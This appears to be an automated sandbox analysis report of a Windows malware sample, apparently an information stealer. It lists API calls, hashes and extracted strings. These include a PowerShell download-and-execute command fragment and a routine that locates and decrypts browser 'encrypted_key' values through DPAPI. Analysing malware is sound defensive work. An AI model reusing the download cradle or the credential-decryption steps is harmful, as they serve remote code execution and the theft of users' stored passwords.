                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                              • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                              • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                              • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022E9C53
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 022E9C78
                              • LocalAlloc.KERNEL32(00000040,?), ref: 022E9C98
                              • ReadFile.KERNEL32(000000FF,?,00000000,022E16F6,00000000), ref: 022E9CC1
                              • LocalFree.KERNEL32(022E16F6), ref: 022E9CF7
                              • CloseHandle.KERNEL32(000000FF), ref: 022E9D01
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                              • Instruction ID: 461739f713f6582ed5ccc2497ea68013164b4033f14286a6be278cc584591a67
                              • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                              • Instruction Fuzzy Hash: 5F311878A10209EFDF14DFD4C884BAE77F5FB49314F108159E916A7294C774AA81CFA1
                              APIs
                              • __getptd.LIBCMT ref: 0041C9EA
                                • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                              • __amsg_exit.LIBCMT ref: 0041CA0A
                              • __lock.LIBCMT ref: 0041CA1A
                              • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                              • free.MSVCRT ref: 0041CA4A
                              • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                              • String ID:
                              • API String ID: 634100517-0
                              • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                              • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                              • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                              • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                              APIs
                              • __getptd.LIBCMT ref: 022FCC51
                                • Part of subcall function 022FC206: __getptd_noexit.LIBCMT ref: 022FC209
                                • Part of subcall function 022FC206: __amsg_exit.LIBCMT ref: 022FC216
                              • __amsg_exit.LIBCMT ref: 022FCC71
                              • __lock.LIBCMT ref: 022FCC81
                              • InterlockedDecrement.KERNEL32(?), ref: 022FCC9E
                              • free.MSVCRT ref: 022FCCB1
                              • InterlockedIncrement.KERNEL32(0042B980), ref: 022FCCC9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                              • String ID:
                              • API String ID: 634100517-0
                              • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                              • Instruction ID: a012a0e43daee45e6e01f8dacfb5f3dfedba2cf864c4fd68e2ce1a776dc9ee4b
                              • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                              • Instruction Fuzzy Hash: 3201AD32A21B2AABC7A1EBE5944475DF760BF08714F404137EE14672A8CB646441DFD9
                              APIs
                              • strlen.MSVCRT ref: 00416F1F
                              • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                              • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                              • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: strlen$MemoryProcessQueryReadVirtual
                              • String ID: @
                              • API String ID: 2950663791-2766056989
                              • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                              • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                              • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                              • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                              APIs
                              • strlen.MSVCRT ref: 022F7186
                              • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,022F7401,00000000,00420BA8,00000000,00000000), ref: 022F71B4
                                • Part of subcall function 022F6E37: strlen.MSVCRT ref: 022F6E48
                                • Part of subcall function 022F6E37: strlen.MSVCRT ref: 022F6E6C
                              • VirtualQueryEx.KERNEL32(022F7574,00000000,?,0000001C), ref: 022F71F9
                              • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022F7401), ref: 022F731A
                                • Part of subcall function 022F7047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 022F705F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: strlen$MemoryProcessQueryReadVirtual
                              • String ID: @
                              • API String ID: 2950663791-2766056989
                              • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                              • Instruction ID: b4bd8eeb78bb4ede988fa66102ea3c19b05c5bbe284d5346f78080d630e382af
                              • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                              • Instruction Fuzzy Hash: A351F8B1D1010AEBDB44CFD8D981AEFF7B6BF88304F048529FA15A7244D774AA11CBA1
                              APIs
                              • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID: *n@$*n@
                              • API String ID: 1029625771-193229609
                              • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                              • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                              • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                              • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                              APIs
                              • lstrcat.KERNEL32(?,0064A30C), ref: 022F4A42
                                • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                              • lstrcat.KERNEL32(?,00000000), ref: 022F4A68
                              • lstrcat.KERNEL32(?,?), ref: 022F4A87
                              • lstrcat.KERNEL32(?,?), ref: 022F4A9B
                              • lstrcat.KERNEL32(?,0064A284), ref: 022F4AAE
                              • lstrcat.KERNEL32(?,?), ref: 022F4AC2
                              • lstrcat.KERNEL32(?,0064A2C8), ref: 022F4AD6
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                • Part of subcall function 022F8FF7: GetFileAttributesA.KERNEL32(00000000,?,022E1DBB,?,?,0042565C,?,?,00420E1F), ref: 022F9006
                                • Part of subcall function 022F47D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022F47E7
                                • Part of subcall function 022F47D7: RtlAllocateHeap.NTDLL(00000000), ref: 022F47EE
                                • Part of subcall function 022F47D7: wsprintfA.USER32 ref: 022F480D
                                • Part of subcall function 022F47D7: FindFirstFileA.KERNEL32(?,?), ref: 022F4824
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                              • Instruction ID: 847f116a5f48ac333e99bcda6484a6307a634ab994cc7fd3dee504f637593392
                              • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                              • Instruction Fuzzy Hash: C83193BA9503086BDB50FBF0CC84EEDB37AAB48700F4045D9B34596084DEB49789CF95
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                              Strings
                              • ')", xrefs: 00412CB3
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                              • <, xrefs: 00412D39
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                              • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                              • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                              • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022E14A5
                              • __aulldiv.LIBCMT ref: 022E14BF
                              • __aulldiv.LIBCMT ref: 022E14CD
                              • ExitProcess.KERNEL32 ref: 022E14FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                              • Instruction ID: 59a76208ba74fbd1e2a55642bedbe2d77768888a787a1a4f4721aeff0056f913
                              • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                              • Instruction Fuzzy Hash: F7016DB0960308BAEF10DBD0CC89B9DBBB9AF00705F608468E70A7B2C4D7B499418B55
                              APIs
                              • memcmp.MSVCRT(?,00421264,00000003), ref: 022EA094
                                • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                • Part of subcall function 022F0CC7: memset.MSVCRT ref: 022F0E83
                                • Part of subcall function 022F0CC7: lstrcat.KERNEL32(?,00000000), ref: 022F0E9C
                                • Part of subcall function 022F0CC7: lstrcat.KERNEL32(?,00420D7C), ref: 022F0EAE
                                • Part of subcall function 022F0CC7: lstrcat.KERNEL32(?,00000000), ref: 022F0EC4
                                • Part of subcall function 022F0CC7: lstrcat.KERNEL32(?,00420D80), ref: 022F0ED6
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                              • memcmp.MSVCRT(?,00421114,00000003), ref: 022EA116
                              • memset.MSVCRT ref: 022EA14F
                              • LocalAlloc.KERNEL32(00000040,?), ref: 022EA1A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                              • String ID: @
                              • API String ID: 1977917189-2766056989
                              • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                              • Instruction ID: 4d61889b6cc6cf9a28471d0d720ec13aac3e0ea3a00a72f8ef000fee25e76126
                              • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                              • Instruction Fuzzy Hash: 66613F316203489BDF24EFE4CD96FDD7776AF44704F408128EA0A5B694DBB46A05CF51
                              APIs
                              • strtok_s.MSVCRT ref: 00410DB8
                              • strtok_s.MSVCRT ref: 00410EFD
                                • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0070F550,?,0042110C,?,00000000), ref: 0041A82B
                                • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: strtok_s$lstrcpylstrlen
                              • String ID:
                              • API String ID: 348468850-0
                              • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                              • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                              • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                              • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                              • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 3731072634-738592651
                              • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                              • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                              • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                              • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: CodeInfoPageValidmemset
                              • String ID:
                              • API String ID: 703783727-0
                              • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                              • Instruction ID: 4a5e80101a10a497395bbe7b4346c7445c58e1068825383f797269a4bf34c7f1
                              • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                              • Instruction Fuzzy Hash: 1C312B31A2429A9ED7A5CFB4C854279FFA09B05314B1942BBDA81CF199D768C405C751
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                              • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,0070A1E8,00000000,00020119,?), ref: 00417E5E
                              • RegQueryValueExA.ADVAPI32(?,007402E8,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00417E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3466090806-0
                              • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                              • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                              • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                              • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F809E
                              • RtlAllocateHeap.NTDLL(00000000), ref: 022F80A5
                              • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 022F80C5
                              • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 022F80E6
                              • RegCloseKey.ADVAPI32(?), ref: 022F80F9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                              • Instruction ID: a96c1d8170eca9f8ab5161e618ed699f30b4f09bbf2a98c685518c80326c3dd5
                              • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                              • Instruction Fuzzy Hash: 0A113DB5A94209BBD710CFD4DD4AFBBF7B9EB05710F104219F615A7290C7B558008BA2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F799B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 022F79A2
                              • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,022F7920), ref: 022F79C2
                              • RegQueryValueExA.ADVAPI32(022F7920,00420AAC,00000000,00000000,?,000000FF), ref: 022F79E1
                              • RegCloseKey.ADVAPI32(022F7920), ref: 022F79EB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                              • Instruction ID: 9f149a9607a88dc5d162e52cf35de991a2837788ad5084777602d06450776d22
                              • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                              • Instruction Fuzzy Hash: 0401FFB9A80308BFEB10DFE4DD4AFAEB7B9EB48701F104559FA05A7284D67596008F52
                              APIs
                              • StrStrA.SHLWAPI(0073F668,?,?,?,0041140C,?,0073F668,00000000), ref: 0041926C
                              • lstrcpyn.KERNEL32(0064AB88,0073F668,0073F668,?,0041140C,?,0073F668), ref: 00419290
                              • lstrlenA.KERNEL32(?,?,0041140C,?,0073F668), ref: 004192A7
                              • wsprintfA.USER32 ref: 004192C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
